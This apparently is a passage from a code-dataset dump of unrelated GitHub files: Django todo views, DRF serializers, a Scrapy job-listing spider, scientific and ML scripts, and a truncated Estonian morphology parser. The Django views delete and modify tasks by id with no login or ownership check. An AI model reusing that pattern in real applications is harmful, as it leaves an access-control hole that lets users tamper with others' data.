messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nfrom todolist.models import Task\nfrom todolist.forms import TaskForm\nfrom datetime import date\nfrom django.http import HttpResponse\nfrom django.core import serializers\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\n@login_required(login_url='/todolist/login/')\ndef show_todolist_ajax(request):\n data = Task.objects.filter(user=request.user).all()\n context = {\n 'todo_list': data,\n } \n return render(request, \"todolist.html\", context)\n\ndef show_json(request):\n data = Task.objects.filter(user=request.user).all()\n return HttpResponse(serializers.serialize(\"json\", data), content_type=\"application/json\")\n\ndef add_task(request):\n if request.method == 'POST':\n title = request.POST.get('title')\n description = request.POST.get('description')\n new_task = Task(\n date=str(date.today()),\n title=title, \n description=description,\n user=request.user,\n )\n new_task.save()\n return HttpResponse(\n ''\n )\n return redirect('todolist:show_todolist_ajax')\n \n\ndef create_task(request):\n form = TaskForm()\n if request.method == 'POST':\n form = TaskForm(request.POST)\n if form.is_valid():\n task = Task(\n date = str(date.today()),\n title = form.cleaned_data[\"task_title\"],\n description = form.cleaned_data[\"task_description\"],\n user = request.user,\n )\n task.save()\n messages.success(request, 'Task berhasil dibentuk')\n return redirect('todolist:show_todolist')\n context = {\"form\": form}\n return render(request, 'create_task.html', context)\n\ndef delete_task(request, id):\n Task.objects.get(pk=id).delete()\n return redirect('todolist:show_todolist_ajax')\n\ndef change_status(request, id):\n task = Task.objects.get(pk=id) \n if (not task.is_finished):\n task.is_finished = True\n task.save()\n return redirect('todolist:show_todolist_ajax')\n\ndef register(request):\n form = UserCreationForm()\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save() \n messages.success(request, 'Akun telah berhasil dibuat!')\n return redirect('todolist:login')\n \n context = {'form':form}\n return render(request, 'register.html', context)\n\ndef login_user(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('todolist:show_todolist_ajax')\n else:\n messages.info(request, 'Username atau Password salah!')\n context = {}\n return render(request, 'login.html', context)\n\ndef logout_user(request):\n logout(request)\n messages.info(request, 'Berhasil logout')\n return redirect('todolist:login')\n\n\n\n\n\n\n","repo_name":"devinahana/Tugas2","sub_path":"todolist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1877223846","text":"from rest_framework import serializers\nfrom rest_framework.relations import PrimaryKeyRelatedField\n\nfrom accounts.serializers import AccountSerializer\nfrom categories.models import SubCategory, MainCategory\nfrom categories.serializers import SubCategorySerializer\nfrom transactions.models import Transaction\n\n\nclass TransactionDetailsSerializer(serializers.ModelSerializer):\n subcategory = SubCategorySerializer()\n account = AccountSerializer()\n\n class Meta:\n model = Transaction\n fields = (\n 'note',\n 'amount',\n 'subcategory',\n 'account',\n 'id',\n 'created',\n )\n read_only_fields = (\n 'created',\n 'id',\n 'subcategory',\n 'account'\n )\n\n\nclass TransactionSerializer(serializers.ModelSerializer):\n subcategory = PrimaryKeyRelatedField(queryset=SubCategory.objects.all())\n account = PrimaryKeyRelatedField(queryset=MainCategory.objects.all())\n\n class Meta:\n model = Transaction\n fields = (\n 'note',\n 'amount',\n 'subcategory',\n 'account',\n 'id',\n )\n read_only_fields = (\n 'created',\n 'id',\n 'subcategory',\n 'account'\n )\n\n def to_representation(self, instance):\n self.fields['subcategory'] = SubCategorySerializer()\n self.fields['account'] = AccountSerializer()\n return super(TransactionSerializer, self).to_representation(instance)\n","repo_name":"ddomeb/yaba","sub_path":"source/yaba/transactions/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33403668766","text":"from __future__ import division\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom builtins import range\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport sys\n\nfrom collections import OrderedDict\nimport pandas as pd\n\ndef hpd(trace, mass_frac):\n \"\"\"\n Returns highest probability density region given by\n a set of samples.\n \n From:\n http://bebi103.caltech.edu.s3-website-us-east-1.amazonaws.com/2015/tutorials/l06_credible_regions.html\n\n Parameters\n ----------\n trace : array\n 1D array of MCMC samples for a single variable\n mass_frac : float with 0 < mass_frac <= 1\n The fraction of the probability to be included in\n the HPD. For example, `massfrac` = 0.95 gives a\n 95% HPD.\n \n Returns\n -------\n output : array, shape (2,)\n The bounds of the HPD\n \"\"\"\n # Get sorted list\n d = np.sort(np.copy(trace))\n\n # Number of total samples taken\n n = len(trace)\n \n # Get number of samples that should be included in HPD\n n_samples = np.floor(mass_frac * n).astype(int)\n \n # Get width (in units of data) of all intervals with n_samples samples\n int_width = d[n_samples:] - d[:n-n_samples]\n \n # Pick out minimal interval\n min_int = np.argmin(int_width)\n \n # Return interval\n return np.array([d[min_int], d[min_int+n_samples]])\n\n\ndef get_summary(d, lls, cifrac = 0.95):\n med = np.median(d)\n mean = np.mean(d)\n max_idx = np.argmax(lls)\n mapest = d[max_idx]\n hpdl, hpdh = hpd(d, cifrac)\n return mapest, mean, med, hpdl, hpdh\n\nparser = argparse.ArgumentParser(\n description='do some analyses of paper example data')\nparser.add_argument('datafile', help = 'data filename, from mope run')\nparser.add_argument('--frac-burnin', '-b', type = float,\n help = 'fraction of data to consider burnin [0.3]',\n default = 0.3)\nparser.add_argument('--old', action ='store_true',\n help = 'specify for old data, drift in natural scale')\nparser.add_argument('--m2', action = 'store_true',\n help = 'use summary statistics from newer data')\nparser.add_argument('--no-change', action = 'store_true',\n help = 'include pointmass at zero')\nparser.add_argument('--lowers', help = 'file with parameter lower limits, one per line')\nargs = parser.parse_args()\n\ndat = pd.read_csv(args.datafile, sep = '\\t', header = 0, comment = '#')\n\nif args.no_change and not args.old:\n # get lowers\n if args.lowers is None:\n lowers = []\n with open(args.datafile) as fin:\n foundlower = False\n for line in fin:\n line = line.strip()\n if 'lower' in line:\n foundlower = True\n continue\n if foundlower:\n if 'upper' in line:\n break\n lowers.append(float(line.split(' ')[-1]))\n else:\n with open(args.lowers) as fin:\n lowers = []\n for line in fin:\n lowers.append(float(line.strip()))\n\n num_length_cols = dat.columns.str.endswith('_l').sum()\n for i in range(num_length_cols):\n low = lowers[i]\n col = dat.columns[i+1] # i+1 because first column is log-likelihood!\n dat.loc[dat[col] < low+1, col] = -np.inf\n\n# convert drift back to natural units\nif not args.old:\n dat.loc[:,dat.columns.str.contains('_l')] = 10**dat.loc[:,dat.columns.str.contains('_l')]\nelse:\n dat.loc[:,dat.columns.str.contains('_l')] = dat.loc[:,dat.columns.str.contains('_l')].abs()\n dat.loc[:,dat.columns.str.contains('_m')] = 10**(-1.0*dat.loc[:,dat.columns.str.contains('_m')].abs())\nburn_idx = int(dat.shape[0] * args.frac_burnin)\ndat_burn = dat.iloc[burn_idx:,:]\n\n# calculate EBSs\n\n# update the new statistic when all of the data is included\nif args.m2:\n mean_age = 29.192876\nelse:\n mean_age = 29.558974\n\n\nif args.m2:\n bots_mean = 2.0/(dat_burn['eoo_pre_l'] + dat_burn['eoo_post_l'] + dat_burn['som_l'] + mean_age*dat_burn['loo_l']).values\n bots_18 = 2.0/(dat_burn['eoo_pre_l'] + dat_burn['eoo_post_l'] + dat_burn['som_l'] + 18*dat_burn['loo_l']).values\n bots_40 = 2.0/(dat_burn['eoo_pre_l'] + dat_burn['eoo_post_l'] + dat_burn['som_l'] + 40*dat_burn['loo_l']).values\nelse:\n bots_mean = (2.0/(2.0/dat_burn['eoo_l'] + \n dat_burn['som_l'] + mean_age*dat_burn['loo_l'])).values\n bots_18 = (2.0/(2.0/dat_burn['eoo_l'] + \n dat_burn['som_l'] + 18*dat_burn['loo_l'])).values\n bots_40 = (2.0/(2.0/dat_burn['eoo_l'] + \n dat_burn['som_l'] + 40*dat_burn['loo_l'])).values\n\n\n# calculate loo rates\nif args.m2:\n bots_25 = 2.0/(dat_burn['eoo_pre_l'] + dat_burn['eoo_post_l'] + dat_burn['som_l'] + 25*dat_burn['loo_l']).values\n bots_34 = 2.0/(dat_burn['eoo_pre_l'] + dat_burn['eoo_post_l'] + dat_burn['som_l'] + 34*dat_burn['loo_l']).values\nelse:\n bots_25 = (2.0/(2.0/dat_burn['eoo_l'] + \n dat_burn['som_l'] + 25*dat_burn['loo_l'])).values\n bots_34 = (2.0/(2.0/dat_burn['eoo_l'] + \n dat_burn['som_l'] + 34*dat_burn['loo_l'])).values\nrates = (bots_34-bots_25)/(34-25)\n\n# calculate bottlenecks for fblo_l and f_buc_l\nbots_fblo = 2.0/dat_burn['fblo_l'].values\nbots_fbuc = 2.0/dat_burn['fbuc_l'].values\n\n# frac post-fert\nfracpf = dat_burn['som_l'].values / (2.0/bots_mean)\n\ncolumns = ['map', 'mean', 'median', 'ci05', 'ci95']\n\nlls = dat_burn['ll'].values\ndat_dict = OrderedDict()\n\n# now get summaries\nfor col in list(dat.columns):\n if col == 'll':\n continue\n dat_dict[col] = get_summary(dat_burn[col].values, lls)\ndat_dict['bots_mean'] = get_summary(bots_mean, lls)\ndat_dict['bots_18'] = get_summary(bots_18, lls)\ndat_dict['bots_40'] = get_summary(bots_40, lls)\ndat_dict['bot_fblo'] = get_summary(bots_fblo, lls)\ndat_dict['bot_fbuc'] = get_summary(bots_fbuc, lls)\ndat_dict['loo_rate'] = get_summary(rates, lls)\ndat_dict['fracpf'] = get_summary(fracpf, lls)\n\n# print output\noutdat = pd.DataFrame.from_dict(dat_dict, orient = 'index')\noutdat.columns = columns\n\noutdat.to_csv(sys.stdout, index_label = 'var', sep = '\\t')\n","repo_name":"ammodramus/mope","sub_path":"examples/do_analysis.py","file_name":"do_analysis.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"30610555605","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nimport requests\nfrom requests import ConnectionError, HTTPError, Timeout\nfrom urllib import urlencode, quote\nfrom jobpic.items import IthotItem\nfrom scrapy.loader import ItemLoader\nfrom scrapy import log\n\nclass JobpicSpider(scrapy.Spider):\n name = \"jobpic\"\n allowed_domains = [\"lagou.com\"]\n start_urls = (\n 'http://www.lagou.com',\n )\n\n cities = []\n\n def __init__(self, category=None, *args, **kwargs):\n for city in open('city.txt', 'r'):\n self.cities.append(city.strip())\n\n def parse(self, response):\n xp = '//*[@id=\"sidebar\"]/div[1]/div/div/dl/dd/a/text()'\n\n for sel in response.xpath(xp).extract():\n item=IthotItem()\n kd = quote(sel.encode('utf-8'))\n\n for city in self.cities:\n for result in self._get_jobs(city, kd):\n for item in result:\n pd = item['positionId']\n item['kd'] = kd\n\n job_url = 'http://www.lagou.com/jobs/' + str(pd) + '.html'\n yield scrapy.Request(url=job_url, meta = item,\n callback=self.parse_detail, errback=self._err_process)\n\n\n def _get_jobs(self, city, kd):\n data = {'first':'false', 'pn':None, 'kd':kd}\n url = 'http://www.lagou.com/jobs/positionAjax.json?city=' + city\n page = 0\n totalpage = 1\n\n while page <= totalpage:\n page += 1\n data['pn'] = page\n\n #try:\n r = requests.post(url, data)\n #except ConnectionError, HTTPError, Timeout:\n # log.msg('send request for get detail error', level=log.ERROR)\n\n result = json.loads(r.text.encode('utf-8'))['content']['result']\n if not totalpage:\n totalpage = json.loads(r.text.encode('utf-8'))['content']['totalPageCount']\n\n yield result\n\n def _err_process(self):\n log.msg('send request for get detail error', level=log.ERROR)\n\n def parse_detail(self, response):\n\n pd = response.meta['positionId']\n kd = response.meta['kd']\n l = ItemLoader(item=IthotItem(), response=response)\n l.add_xpath('salary', '//*[@id=\"job_detail\"]/dd[1]/p[1]/span[1]/text()')\n l.add_xpath('local', '//*[@id=\"job_detail\"]/dd[1]/p[1]/span[2]/text()')\n\n l.add_xpath('years', '//*[@id=\"job_detail\"]/dd[1]/p[1]/span[3]/text()')\n l.add_xpath('edu', '//*[@id=\"job_detail\"]/dd[1]/p[1]/span[4]/text()')\n l.add_xpath('detail', '//*[@id=\"job_detail\"]/dd[2]/p/text()')\n l.add_xpath('detail', '//*[@id=\"job_detail\"]/dd[2]/p/span/text()')\n l.add_xpath('detail', '//*[@id=\"job_detail\"]/dd[2]/ul/li/text()')\n l.add_xpath('detail', '//*[@id=\"job_detail\"]/dd[2]/ul/li/p/text()')\n l.add_value('pd', pd)\n l.add_value('kd', kd)\n\n return l.load_item()\n","repo_name":"renyunfei/jobpic","sub_path":"jobpic/spiders/hot.py","file_name":"hot.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7614264850","text":"import numpy as np\r\nfrom tqdm import tqdm\r\n\r\nclass GloVe:\r\n\tdef __init__(self):\r\n\t\tself.model_path = './glove/glove.6B.100d.txt'\r\n\t\tself.embeddings_index = None\r\n\t\tself.initialize_glove()\r\n\r\n\tdef initialize_glove(self):\r\n\t\tself.embeddings_index = {}\r\n\t\twith open(self.model_path, encoding=\"utf8\") as f:\r\n\t\t\tfor line in tqdm(f, total=400000, desc='Extracting GloVe Embeddings'):\r\n\t\t\t\tvalues = line.split();\r\n\t\t\t\tword = values[0];\r\n\t\t\t\tcoefs = np.asarray(values[1:], dtype='float32');\r\n\t\t\t\tself.embeddings_index[word] = coefs;\r\n\r\n\tdef glove_extract(self, tag):\r\n\t\tembeddings = []\r\n\t\tfor w in tag.split():\r\n\t\t\ttry:\r\n\t\t\t\tembeddings.append(self.embeddings_index[w])\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\t\tif len(embeddings) == 0:\r\n\t\t\tembeddings = np.zeros((1, 100))\r\n\t\treturn np.array(embeddings)","repo_name":"AmanPriyanshu/EDCCT-Embedders-for-Deep-Contextual-Clustering-of-Tags","sub_path":"glove_embed.py","file_name":"glove_embed.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73427614965","text":"import numpy as np\nimport math\n\n# determine if cubesat is in eclipse\n# Re = radius of Earth in m\nRe = 6371000\n\n\ndef inEclipse(scx, scy, scz, sx, sy, sz):\n # find magnitude of spacecraft position vector\n # vector found from previous file code 2.2.1\n SpacecraftPosition = np.array([scx, scy, scz])\n Rsc = np.linalg.norm(SpacecraftPosition)\n print('Rsc', Rsc)\n\n # find magnitude of sun position vector\n SunPosition = np.array([sx, sy, sz])\n Rs = np.linalg.norm(SunPosition)\n print('Rs', Rs)\n\n # calculate the two angles that define the transition point from sun to shade\n input1 = Re / Rsc\n input2 = Re / Rs\n\n theta1 = math.acos(input1)\n theta2 = math.acos(input2)\n\n thetaTotal = theta1 + theta2\n\n # calculate the angle between the spacecraft's actual position vector and the sun's position vector\n thetaActual = math.acos((np.dot(SpacecraftPosition, SunPosition)) / (Rsc * Rs))\n\n print(f'thetaActual = {thetaActual}, thetaTotal: {thetaTotal}')\n\n return thetaActual > thetaTotal\n","repo_name":"connie-liou/STAR-Thermal","sub_path":"EclipseAngle.py","file_name":"EclipseAngle.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"70970590967","text":"\"\"\"\nNaloga: \nPodan imate dataset učencev in njihovih ocen.\nS pomočjo list comprehensions ustvarite nov list v katerem so samo imena učencev, ki so opravili izpit (ocena more biti večja ali enaka 55).\n\nPrimeri:\n\nInput:\nstudents = [ [\"Ana\", 55], [\"Anže\", 96], [\"Andrej\", 67], [\"Bojan\", 88], [\"Črt\", 100], [\"Dajana\", 49], [\"Erika\", 79], [\"Francis\", 11] ]\n\nOutput:\n['Ana', 'Anže', 'Andrej', 'Bojan', 'Črt', 'Erika']\n\"\"\"\nstudents = [\n [\"Ana\", 55],\n [\"Anže\", 96],\n [\"Andrej\", 67],\n [\"Bojan\", 88],\n [\"Črt\", 100],\n [\"Dajana\", 49],\n [\"Erika\", 79],\n [\"Francis\", 11],\n]\n\nopravili = [key for key, value in students if value >= 55]\nprint(opravili)\n","repo_name":"Yachara/ICTA_Python_Osnovni_public","sub_path":"Termin_05/DN_05/DN05_03.py","file_name":"DN05_03.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30898920921","text":"import numpy as np\n\na = np.array([0.1, 0.2, 0.3])\na.dtype = np.int8()\nprint(a, a.size)\nprint(a.itemsize) # сколько байт занимет один элемент\n\nb = np.ones((3,4,5))\nprint(b.ndim) # колитчество осей\nprint(b.shape) # количество элементов по каждой оси\nb.shape = 12, 5\nprint(b)\nc = b.reshape(3,2,10) # она не создаёт нового массива, а создаёт другое представление тех же данных\nprint(c)\nd = b.T # трансопинование\nprint(d)\n# массивы и их представления это разные понятия\n\na = np.array([1,2,3,4,5,6,7,8,9])\nb = a.view() # копия представления\na.shape = 3,3 \nprint(b)\n\na = np.array([1,2,3,4,5,6,7,8,9])\nb = a.copy() # копия данных массива","repo_name":"RavenDenster/base-numPy-selfedu","sub_path":"features-performance-array.py","file_name":"features-performance-array.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39025741791","text":"from keras.models import Model\r\nfrom keras import layers\r\n\r\n\r\ndef my_model_simple(input_length=1024):\r\n # basit bir model tanımlaması yapalım shape ile katmanlara bir şekil, dtype ile veri türü ileterek bu modelin bir gözlem için ne tür verileri kabul edeceğini belirtiyoruz \r\n input = layers.Input(shape=(input_length,), dtype='float32')\r\n#dense keras modellerini geliştirirken kullanacağınız en yaygın katman türüdür.\r\n# dense iki argüman alır. 513 nöron istediğmizi belirtmek için units ve bu nöronların düzeltilmiş doğrusal birim(ReLU) nöronlar olmasını istediğimizi belirtmek için activiation=relu alır.\r\n\r\n middle = layers.Dense(units=512, activation='relu')(input)\r\n#burada densenin outputunu tanımlıyoruz burada tek bir nöron alır. ve bir sigmoid aktivasyonunu alır. bu çok sayıda veriyi 0 ile 1 arasındaki tek bir skorda birleştirmek için harikadır. \r\n# çıktı katmanı, girdi olarak nesne, orta katmanımızda ki 512 nöronmuzun çıktılarının hepsinin bu nörona gönderilmesi gerektiğini bildirir.\r\n output = layers.Dense(units=1, activation='sigmoid')(middle)\r\n\r\n model = Model(inputs=input, outputs=output)\r\n #en sonda modeli derleriz. optimizer kullanılacak geri yayılım algoritmasının türünü belirtir.\r\n #loss parametresi eğitim süreci sırasında en aza indirilen şeyi belirtir. \r\n #metric eğitim sırasında ve sonrasında model performansını analiz ederken kerasın raporlamasını istediğiniz metriklerin bir listesini iletebilirsiniz.\r\n model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy'])\r\n return model\r\n#tam bu noktada bu fonksyionu görmek için model.summary()ile oluşturulan modeli görebilirsin.\r\n\r\n\r\ndef my_model(input_length=1024):\r\n # Note that we can name any layer by passing it a \"name\" argument.\r\n input = layers.Input(shape=(input_length,), dtype='float32', name='input')\r\n\r\n # We stack a deep densely-connected network on tops\r\n x = layers.Dense(1024, activation='relu')(input)\r\n x = layers.normalization.BatchNormalization()(x)\r\n x = layers.Dense(512, activation='relu')(x)\r\n x = layers.normalization.BatchNormalization()(x)\r\n x = layers.Dense(64, activation='relu')(x)\r\n x = layers.normalization.BatchNormalization()(x)\r\n\r\n # And finally we add the last (logistic regression) layer:\r\n output = layers.Dense(1, activation='sigmoid', name='output')(x)\r\n\r\n model = Model(inputs=input, outputs=output)\r\n model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy'])\r\n return model\r\n\r\n\r\nif __name__ == '__main__':\r\n simple_model = my_model_simple(1024)\r\n model = my_model(1024)\r\n print(simple_model.summary())","repo_name":"sinemsahn/yenibitirmeprojesi","sub_path":"bitirme/model_arcitecture.py","file_name":"model_arcitecture.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"42681597047","text":"# -*- coding: utf-8 -*-\n\n\n#leidub osalauses esineb kindla morfanalüüsiga sõna\n#cm+:_V_ aux clause_morf+:\n#cl+:koer clause_lemma+:koer\n\n\n#Supported input format XML-like format as shown below:\n\n\n\n#Output format inforem\n\n######## libraries ########\nfrom __future__ import print_function\n\nimport os\nimport re\nimport sys\nimport codecs\n\n\n#############################################\n# common functions\n#############################################\ndef isPythonVersion(version):\n\tif float(sys.version[:3]) == version:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef make_sure_path_exists(path):\n\timport errno\n\ttry:\n\t\tos.makedirs(path)\n\texcept NameError as exception:\n\t\tprint('here')\n\texcept OSError as exception:\n\t\tif exception.errno != errno.EEXIST:\n\t\t\traise\n\t\t\n\t\t\ndef eprint(*args, **kwargs):\n\tprint(*args, file=sys.stderr, **kwargs)\n\n\n\nclass bColors:\n\tcolors1 = (\n\t\t'\\033[1;31m', '\\033[1;32m', '\\033[1;33m', '\\033[1;34m', '\\033[1;35m', '\\033[1;36m', '\\033[1;37m', '\\033[1;38m',\n\t\t'\\033[1;39m'\n\t)\n\n\tstyle = {\n\t\t'bold': '\\033[1m'\n\t\t, 'red': '\\033[1;31m'\n\t\t, 'green': '\\033[0;32m'\n\t\t, 'yellow': '\\033[0;33m'\n\t\t, 'blue': '\\033[0;34m'\n\t\t, 'endc': '\\033[0m'\n\t}\n\tpattern_red = style['red'] + '%s' + style['endc']\n\tpattern_yellow = style['yellow'] + '%s' + style['endc']\n\tpattern_green = style['green'] + '%s' + style['endc']\n\tpattern_blue = style['blue'] + '%s' + style['endc']\n\tpattern_bold = style['bold'] + '%s' + style['endc']\n\n\tENDC = '\\033[0m'\n\tBOLD = '\\033[1m'\n\tUNDERLINE = '\\033[4m'\n\n\nif __name__ == '__main__':\n\tif sys.stdout.encoding is None:\n\t\teprint(\n\t\t\tbColors.pattern_red % \"please set python env PYTHONIOENCODING=UTF-8, example: export PYTHONIOENCODING=UTF-8, when write to stdout.\")\n\t\texit(1)\n\t\t\n\n\ndef path_leaf(path):\n\timport ntpath\n\thead, tail = ntpath.split(path)\n\treturn tail or ntpath.basename(head)\n\n\n################################\n# dictionary functions and global variables\n#############################\n\n######## dictonary functions ########\n\n\n\ndef read_parse_dict(dictname, dict={}):\n\t\n\tglobal global_conf\n\ttry:\n\t\tf_tsv_dict = codecs.open(dictname, \"r\", \"utf-8\")\n\texcept IOError:\n\t\teprint(bColors.pattern_red % ('Cannot open %s' % dictname))\n\t\texit()\n\t\t\n\tdict_rows_count=0\n\twith f_tsv_dict as tsv:\n\t\tfor line in tsv:\n\t\t\tline = line.strip()\n\t\t\trow = line.split(\"\\t\")\n\t\t\tif len(row)>=2:\n\t\t\t\tif row[1]!='0':\n\t\t\t\t\tdict_rows_count += 1\n\t\t\t\t\tdict_record={}\n\t\t\t\t\tif not row[0].lower() in dict:\n\t\t\t\t\t\tdict[row[0].lower()]=[]\n\t\t\t\t\tdict_record['morf'] = row[1]\n\t\t\t\t\tdict_record['rules'] = []\n\t\t\t\t\ti=2\n\t\t\t\t\twhile i 0:\n\t\t\t\t\t\t\t\t\t\tsub_weigth = sub_sub_weigth\n\t\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif sub_weigth == 0:\n\t\t\t\t\t\t\t\t\trule_total_weight = 0\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\trule_total_weight += sub_weigth\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telif ruletype[-9:] == '_gramcat-':\n\t\t\t\t\t\t\t\tsub_weigth = dict_weight[ruletype]\n\t\t\t\t\t\t\t\t#eprint('rule',rule_strings)\n\t\t\t\t\t\t\t\t#eprint ('text',strings_to_compare)\n\t\t\t\t\t\t\t\tfor text_string in strings_to_compare:\n\t\t\t\t\t\t\t\t\tarray_gramcats = text_string.lower().split(' ')\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tif set(rule_strings) < set(array_gramcats):\n\t\t\t\t\t\t\t\t\t\tsub_weigth = 0\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tif sub_weigth == 0:\n\t\t\t\t\t\t\t\t\t\trule_total_weight = 0\n\t\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\trule_total_weight += sub_weigth\n\t\t\t\t\t\t\t\t\n\n\t\t\t\t\t\t\t#morf and lemma rules\n\t\t\t\t\t\t\telif ruletype[-1:] == '+': #reegel, et string leidub\n\t\t\t\t\t\t\t\tsub_weigth = 0\n\t\t\t\t\t\t\t\tfor text_string in strings_to_compare:\n\t\t\t\t\t\t\t\t\tfor rule_string in rule_strings:\n\t\t\t\t\t\t\t\t\t\tif text_string == rule_string:\n\t\t\t\t\t\t\t\t\t\t\tsub_weigth = dict_weight[ruletype]\n\t\t\t\t\t\t\t\t\t\t\t#print ('leidus')\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\tif sub_weigth == 0:\n\t\t\t\t\t\t\t\t\trule_total_weight = 0\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\trule_total_weight += sub_weigth\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telif ruletype[-1:] == '-':\n\t\t\t\t\t\t\t\tsub_weigth = dict_weight[ruletype]\n\t\t\t\t\t\t\t\tfor text_string in strings_to_compare:\n\t\t\t\t\t\t\t\t\tfor rule_string in rule_strings:\n\t\t\t\t\t\t\t\t\t\tif text_string == rule_string:\n\t\t\t\t\t\t\t\t\t\t\tsub_weigth = 0\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\tif sub_weigth == 0:\n\t\t\t\t\t\t\t\t\trule_total_weight = 0\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\trule_total_weight += sub_weigth\n\t\t\t\t\t\t\t\t\n\n\t\t\t\t\t\tif rule_total_weight > 0:\n\t\t\t\t\t\t\tmatched_rules[rule_total_weight] = rulemorf\n\n\n\t\t\t\t#print (matched_rules)\n\t\t\t\t#print (morf)\n\t\t\t\t#kui üksi reegel ei sobinud\n\t\t\t\t\n\t\t\t\tif not matched_rules:\n\t\t\t\t\tmissing_morf[morf_orig] = 1\n\n\t\t\t\telse:\n\t\t\t\t\tsentence_dict['lines'][lineid]['info']['analys']['morf'][i] = matched_rules[(max(matched_rules.keys(), key=int))]\n\t\n\n\n\treturn sentence_dict\n\n\n######################################\n# inforem output functions\n####################################\n\ndef construct_inforem_sentence(sentence, sentence_id):\n\tglobal global_conf\n\tflags = global_conf['conf']['flags']\n\tsentence_str = ''\n\tif not '1' in flags:\n\t\tsentence_str = \"\\\"\\\"\\n\\n\" % sentence_id\n\tfor line_id in sorted(sentence['lines']):\n\t\tif g_d_sentence['lines'][line_id]['type'] == 'token':\n\t\t\tsentence_str += construct_line_inforem(sentence['lines'][line_id]['info']) + \"\\n\"\n\tif not '1' in flags:\n\t\tsentence_str += '\"\"' + \"\\n\" + \"\\n\"\n\treturn sentence_str\n\n\ndef construct_line_inforem(dict_info):\n\n\n\treturn_line_pattern = '\"<%s>\"%s'\n\tmorf_pattern1 = \"\\n\\t\" + '\"%s\" L%s %s%s%s%s%s%s'\n\tmorf_pattern2 = \"\\n\\t\" + '\"%s\" %s %s%s%s%s%s'\n\tfunction_pattern = ' %s'\n\trelation_pattern = ' #%s'\n\n\tpattern_synt_rel = ' {%s:%s}'\n\n\tpattern_synt_type = ' {%s}'\n\tpattern_pos = '%s '\n\tsynt_relations = ''\n\tif 'ann_relations' in dict_info:\n\t\t# synt_relations = dict_info['ann_relations']\n\t\tfor rel in dict_info['ann_relations']:\n\t\t\tsynt_relations += (pattern_synt_rel % (rel, ','.join(dict_info['ann_relations'][rel])))\n\n\tsynt_type = ''\n\tif 'ann_type' in dict_info:\n\t\tsynt_type = pattern_synt_type % dict_info['ann_type']\n\tstr_morf = ''\n\n\tfor i, v in enumerate(dict_info['analys']['lemma']):\n\t\tlemma = v\n\t\tmorf = dict_info['analys']['morf'][i]\n\t\tcase = dict_info['analys']['case'][i]\n\t\tpos = dict_info['analys']['pos'][i]\n\t\tfunctions = ''\n\t\trelations = ''\n\n\t\tif dict_info['analys']['function'][i] != '':\n\t\t\tfunctions = function_pattern % (dict_info['analys']['function'][i])\n\t\tif dict_info['analys']['relation'][i] != '':\n\t\t\trelations = relation_pattern % (dict_info['analys']['relation'][i])\n\t\tif pos:\n\t\t\tpos = pattern_pos % pos\n\t\tif case != '':\n\t\t\tstr_morf = str_morf + (morf_pattern1 % (lemma, case, pos, morf, functions, relations, synt_type, synt_relations))\n\t\telse:\n\t\t\tstr_morf = str_morf + (morf_pattern2 % (lemma, pos, morf, functions, relations, synt_type, synt_relations))\n\t\tstr_morf = str_morf.replace(' ',' ')\n\n\treturn return_line_pattern % (dict_info['token'], str_morf)\n\n\n##################################\n# estmorf input parse functions\n#################################\n\ndef new_clause_id():\n\t\"\"\"\n\n\t:rtype: int\n\t\"\"\"\n\tglobal g_d_sentence\n\tif 'clauseTokens' in g_d_sentence:\n\t\tnewKey = max(g_d_sentence['clauseTokens'].keys()) + 1\n\t\tg_d_sentence['clauseTokens'][newKey] = []\n\n\t\treturn newKey\n\telse:\n\t\tg_d_sentence['clauseTokens'] = {}\n\t\tg_d_sentence['clauseParent'] 